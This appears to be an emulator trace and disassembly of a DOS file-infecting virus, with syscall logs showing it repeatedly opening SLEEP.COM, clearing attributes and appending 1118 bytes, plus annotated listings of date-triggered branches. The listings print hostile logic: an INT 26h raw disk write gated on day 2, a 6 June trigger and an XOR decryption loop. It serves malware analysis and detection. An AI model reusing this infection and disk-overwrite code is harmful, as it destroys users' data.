2018-12-25T12:39:34.853125092Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.855158769Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.861689518Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.864649533Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.868036924Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.871669377Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.873394205Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.876802847Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.885822899Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.888318949Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.891222981Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.899047389Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.908943886Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.912618658Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.919504187Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.926504953Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.929682457Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.940096596Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.942137112Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.949599739Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.951703901Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.953606768Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.955389976Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.957048878Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.958554087Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.963887828Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.975434884Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.977285007Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.985028739Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.995389958Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.99752548Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:35.001382385Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:34.873666491Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.877059855Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:34.886111206Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:34.890020105Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.891933444Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:34.903374703Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.909688791Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.916451908Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]
0x12c93: mov byte ptr [si], dl
0x12c95: mov ax, 0x4301
0x12c98: xor cx, cx
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02
0x12ca9: int 0x21
0x12cab: jb 0x12c5e
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax
0x12cb3: xchg ax, bx
0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.919272997Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.934496209Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:34.936607972Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.943973237Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.946616099Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.949185795Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.952530505Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:34.954281204Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.956718448Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.965921659Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.967990731Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.969468521Z 62 PC: 12d0b | Close file
2018-12-25T12:39:34.976363583Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.982716228Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:34.984579505Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.989271942Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.994474334Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.997143413Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.008066029Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.010014212Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:35.016677428Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.019929582Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.023423169Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.025955333Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.02823102Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.030761051Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.039309742Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.041739299Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.051088711Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.062496364Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.072216461Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:35.075093879Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.081460651Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.087701974Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.090754264Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.100744636Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.102797955Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:35.111248067Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.115674129Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.119125043Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.122777053Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.124536298Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.127102353Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.140152058Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.142849076Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.144712043Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.15337102Z 67 PC: 12d1c | Get or set file attributes (See above)
; Disassembly from the return address of a second "Get date" call (INT 21h AH=2Ah,
; DH = month, DL = day). DX == 0x0606 (6 June) selects the branch to 0x12d21; any
; other date continues at 0x12d8c. The run-configuration records on this page use
; 1 January, so only the 0x12d8c side is exercised by this trace.
; Everything after the two unconditional jumps is a linear-sweep decode, not traced code.
2018-12-25T12:39:35.163469362Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; month:day == 06:06 ?
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c  ; any other date
0x12b75: jmp 0x12d21  ; 6 June: date-gated branch, body not shown here
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 follow an unconditional jmp and decode implausibly — likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; if these bytes are 00 55 8B EC, decoding from 0x12b81 gives push bp / mov bp, sp, matching the [bp - 0x2c] use below — confirm against the raw bytes
0x12b83: in al, dx
0x12b84: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = 0x1b5 + word at DS:0x106 (search pattern); the int 0x21 is past the end of the listing
2018-12-25T12:39:35.165492104Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:35.169245541Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly from the return address of the DOS "Get date" call (INT 21h AH=2Ah,
; DL = day of month). The raw disk-write path at 0x12a61 runs only when DL == 2.
; The run-configuration records on this page use Day 1, so this trace takes the
; jmp to the ret and never exercises that path.
2018-12-25T12:39:35.365657799Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a61  ; yes -> disk-write path
0x12a5f: jmp 0x12a7e  ; no -> plain return
0x12a61: cli  ; mask interrupts
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): in 16-bit code this one-byte opcode acts as cwd (DX = sign of AX, 0 here since AH = 2); "cdq" is presumably a disassembler quirk
0x12a65: mov cx, 0x100  ; CX = 0x100, the sector count for the interrupt below
0x12a68: int 0x26  ; DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer); AL is not loaded in the visible lines
0x12a6a: jmp 0x12a6c  ; hop to the next instruction
0x12a6c: cli
0x12a6d: mov al, 3  ; register setup ahead of the call below
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61  ; NOTE(review): with 16-bit offset wrap-around this target would be 0x12a61, the disk-write path above — confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; bytes after the ret: load from DS:SI ...
0x12a80: xor al, ah  ; ... XOR with the byte in AH ...
0x12a82: stosb byte ptr es:[di], al  ; ... store to ES:DI; the listing ends here, so the loop bounds are not visible
2018-12-25T12:39:35.369175182Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:35.3722129Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:35.376718191Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:35.378108979Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:35.385273557Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.392508486Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Disassembly from the return address of the DOS "Get time" call (INT 21h AH=2Ch,
; DH = seconds, DL = hundredths). Stores a clock-derived byte, clears the file's
; attributes, closes the handle and reopens the file read/write. Attribute reset
; followed by a read/write reopen is the sequence a behavioural monitor can key on.
; The listing stops after AH = 40h is loaded, before the INT 21h that writes.
2018-12-25T12:39:35.399947619Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; DL = hundredths + seconds (8-bit sum)
0x12c8a: je 0x12c84  ; sum is zero -> branch back, presumably to read the clock again
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106 (looks like a base/delta offset — confirm)
0x12c93: mov byte ptr [si], dl  ; store the clock-derived byte; presumably a key, its consumer is not in this listing
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 -> clears read-only/hidden/system
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = SI + 0xC7, the path argument
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02  ; AH=3Dh open, AL=2: read/write access
0x12ca9: int 0x21
0x12cab: jb 0x12c5e  ; CF set = open failed -> leave this path
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; save the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to handle; the int 0x21 itself is past the end of the listing
2018-12-25T12:39:35.403448497Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:35.42487994Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:35.42680484Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.434907439Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:35.442360098Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.445217203Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.448573353Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:35.450484156Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.453111698Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:35.462707633Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.465620655Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:35.46699651Z 62 PC: 12d0b | Close file
2018-12-25T12:39:35.475151615Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:35.486904909Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:35.489816664Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.496933413Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.50501802Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.507688555Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.519263802Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.522133905Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:35.529518961Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.532830472Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.536278944Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.539461631Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.541290337Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.543782154Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.553334775Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.555083492Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.556233097Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.562145555Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.57017983Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:35.572930816Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.5805748Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.588103468Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.59077914Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.602229194Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.604194615Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:35.617356199Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.625487906Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.628580916Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.63170729Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.634414949Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.637155363Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.646917271Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.650610861Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.65312263Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.661939881Z 67 PC: 12d1c | Get or set file attributes (See above)
; Disassembly from the return address of a second "Get date" call (INT 21h AH=2Ah,
; DH = month, DL = day). DX == 0x0606 (6 June) selects the branch to 0x12d21; any
; other date continues at 0x12d8c. The run-configuration records on this page use
; 1 January, so only the 0x12d8c side is exercised by this trace.
; Everything after the two unconditional jumps is a linear-sweep decode, not traced code.
2018-12-25T12:39:35.673182519Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; month:day == 06:06 ?
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c  ; any other date
0x12b75: jmp 0x12d21  ; 6 June: date-gated branch, body not shown here
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 follow an unconditional jmp and decode implausibly — likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; if these bytes are 00 55 8B EC, decoding from 0x12b81 gives push bp / mov bp, sp, matching the [bp - 0x2c] use below — confirm against the raw bytes
0x12b83: in al, dx
0x12b84: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = 0x1b5 + word at DS:0x106 (search pattern); the int 0x21 is past the end of the listing
2018-12-25T12:39:35.6765454Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:35.681684099Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly from the return address of the DOS "Get date" call (INT 21h AH=2Ah,
; DL = day of month). The raw disk-write path at 0x12a61 runs only when DL == 2.
; The run-configuration records on this page use Day 1, so this trace takes the
; jmp to the ret and never exercises that path.
2018-12-25T12:39:35.810805679Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a61  ; yes -> disk-write path
0x12a5f: jmp 0x12a7e  ; no -> plain return
0x12a61: cli  ; mask interrupts
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): in 16-bit code this one-byte opcode acts as cwd (DX = sign of AX, 0 here since AH = 2); "cdq" is presumably a disassembler quirk
0x12a65: mov cx, 0x100  ; CX = 0x100, the sector count for the interrupt below
0x12a68: int 0x26  ; DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer); AL is not loaded in the visible lines
0x12a6a: jmp 0x12a6c  ; hop to the next instruction
0x12a6c: cli
0x12a6d: mov al, 3  ; register setup ahead of the call below
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61  ; NOTE(review): with 16-bit offset wrap-around this target would be 0x12a61, the disk-write path above — confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; bytes after the ret: load from DS:SI ...
0x12a80: xor al, ah  ; ... XOR with the byte in AH ...
0x12a82: stosb byte ptr es:[di], al  ; ... store to ES:DI; the listing ends here, so the loop bounds are not visible
2018-12-25T12:39:35.813818758Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:35.816986805Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:35.821328075Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:35.822509772Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:35.830064078Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.837876657Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Disassembly from the return address of the DOS "Get time" call (INT 21h AH=2Ch,
; DH = seconds, DL = hundredths). Stores a clock-derived byte, clears the file's
; attributes, closes the handle and reopens the file read/write. Attribute reset
; followed by a read/write reopen is the sequence a behavioural monitor can key on.
; The listing stops after AH = 40h is loaded, before the INT 21h that writes.
2018-12-25T12:39:35.845197598Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; DL = hundredths + seconds (8-bit sum)
0x12c8a: je 0x12c84  ; sum is zero -> branch back, presumably to read the clock again
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106 (looks like a base/delta offset — confirm)
0x12c93: mov byte ptr [si], dl  ; store the clock-derived byte; presumably a key, its consumer is not in this listing
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 -> clears read-only/hidden/system
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = SI + 0xC7, the path argument
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02  ; AH=3Dh open, AL=2: read/write access
0x12ca9: int 0x21
0x12cab: jb 0x12c5e  ; CF set = open failed -> leave this path
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; save the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to handle; the int 0x21 itself is past the end of the listing
2018-12-25T12:39:35.848763737Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:35.870332308Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:35.872934469Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.8817961Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:35.889515775Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.892792617Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.896697173Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:35.898504911Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.904810189Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:35.91511685Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.917502412Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:35.91902148Z 62 PC: 12d0b | Close file
2018-12-25T12:39:35.942025072Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:35.953989364Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:35.957167093Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.968509406Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.975850676Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.978449071Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.989511555Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.991779178Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:35.999127766Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:36.002111332Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:36.006558442Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:36.009541549Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:36.011160775Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.014391383Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:36.024849694Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.027448083Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:36.030284815Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:36.040280801Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:36.051490926Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:36.055989464Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:36.064098931Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:36.07173741Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:36.075805444Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:36.087516555Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:36.089931221Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:36.098137636Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:36.102066883Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:36.105273719Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:36.108668909Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:36.111437281Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.114432527Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:36.124440104Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.127625369Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:36.129706473Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:36.14049012Z 67 PC: 12d1c | Get or set file attributes (See above)
; Disassembly from the return address of a second "Get date" call (INT 21h AH=2Ah,
; DH = month, DL = day). DX == 0x0606 (6 June) selects the branch to 0x12d21; any
; other date continues at 0x12d8c. The run-configuration records on this page use
; 1 January, so only the 0x12d8c side is exercised by this trace.
; Everything after the two unconditional jumps is a linear-sweep decode, not traced code.
2018-12-25T12:39:36.153169576Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; month:day == 06:06 ?
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c  ; any other date
0x12b75: jmp 0x12d21  ; 6 June: date-gated branch, body not shown here
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 follow an unconditional jmp and decode implausibly — likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; if these bytes are 00 55 8B EC, decoding from 0x12b81 gives push bp / mov bp, sp, matching the [bp - 0x2c] use below — confirm against the raw bytes
0x12b83: in al, dx
0x12b84: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = 0x1b5 + word at DS:0x106 (search pattern); the int 0x21 is past the end of the listing
2018-12-25T12:39:36.155661826Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:36.160263516Z 59 PC: 12d9e | Change current directory

